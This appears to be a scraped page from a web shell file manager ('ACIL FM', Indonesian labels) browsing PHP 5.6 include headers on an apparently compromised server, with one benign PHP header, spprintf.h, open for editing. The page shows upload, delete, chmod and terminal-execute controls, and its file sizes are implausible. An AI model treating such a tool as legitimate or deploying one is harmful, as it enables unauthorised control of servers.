ACIL FM
Dark
Refresh
Current DIR:
/opt/alt/php56/usr/include/php/main
/
opt
alt
php56
usr
include
php
main
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
streams
-
chmod
Open
Rename
Delete
build-defs.h
7.41 MB
chmod
View
DL
Edit
Rename
Delete
fopen_wrappers.h
2.75 MB
chmod
View
DL
Edit
Rename
Delete
php.h
11.72 MB
chmod
View
DL
Edit
Rename
Delete
php_compat.h
17.61 MB
chmod
View
DL
Edit
Rename
Delete
php_config.h
56.53 MB
chmod
View
DL
Edit
Rename
Delete
php_content_types.h
1.47 MB
chmod
View
DL
Edit
Rename
Delete
php_getopt.h
2.02 MB
chmod
View
DL
Edit
Rename
Delete
php_globals.h
4.08 MB
chmod
View
DL
Edit
Rename
Delete
php_ini.h
3.67 MB
chmod
View
DL
Edit
Rename
Delete
php_main.h
2.61 MB
chmod
View
DL
Edit
Rename
Delete
php_memory_streams.h
3.52 MB
chmod
View
DL
Edit
Rename
Delete
php_network.h
9.58 MB
chmod
View
DL
Edit
Rename
Delete
php_open_temporary_file.h
1.71 MB
chmod
View
DL
Edit
Rename
Delete
php_output.h
10.04 MB
chmod
View
DL
Edit
Rename
Delete
php_reentrancy.h
3.6 MB
chmod
View
DL
Edit
Rename
Delete
php_scandir.h
1.89 MB
chmod
View
DL
Edit
Rename
Delete
php_stdint.h
4.63 MB
chmod
View
DL
Edit
Rename
Delete
php_streams.h
29.73 MB
chmod
View
DL
Edit
Rename
Delete
php_syslog.h
1.54 MB
chmod
View
DL
Edit
Rename
Delete
php_ticks.h
1.52 MB
chmod
View
DL
Edit
Rename
Delete
php_variables.h
2 MB
chmod
View
DL
Edit
Rename
Delete
php_version.h
266 B
chmod
View
DL
Edit
Rename
Delete
rfc1867.h
3.36 MB
chmod
View
DL
Edit
Rename
Delete
SAPI.h
9.89 MB
chmod
View
DL
Edit
Rename
Delete
snprintf.h
6.86 MB
chmod
View
DL
Edit
Rename
Delete
spprintf.h
2.02 MB
chmod
View
DL
Edit
Rename
Delete
win32_internal_function_disabled.h
1.61 MB
chmod
View
DL
Edit
Rename
Delete
win95nt.h
2.63 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/alt/php56/usr/include/php/main/spprintf.h
/* +----------------------------------------------------------------------+ | PHP Version 5 | +----------------------------------------------------------------------+ | Copyright (c) 1997-2016 The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Marcus Boerger <helly@php.net> | +----------------------------------------------------------------------+ */ /* $Id$ */ /* The pbuf parameter of all spprintf version receives a pointer to the allocated buffer. This buffer must be freed manually after usage using efree() function. The buffer will always be terminated by a zero character. When pbuf is NULL the function can be used to calculate the required size of the buffer but for that purpose snprintf is faster. When both pbuf and the return value are 0 than you are out of memory. There is also snprintf: See difference explained in snprintf.h */ #ifndef SPPRINTF_H #define SPPRINTF_H #include "snprintf.h" BEGIN_EXTERN_C() PHPAPI int spprintf( char **pbuf, size_t max_len, const char *format, ...) PHP_ATTRIBUTE_FORMAT(printf, 3, 4); PHPAPI int vspprintf(char **pbuf, size_t max_len, const char *format, va_list ap) PHP_ATTRIBUTE_FORMAT(printf, 3, 0); END_EXTERN_C() #endif /* SNPRINTF_H */ /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * End: */
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply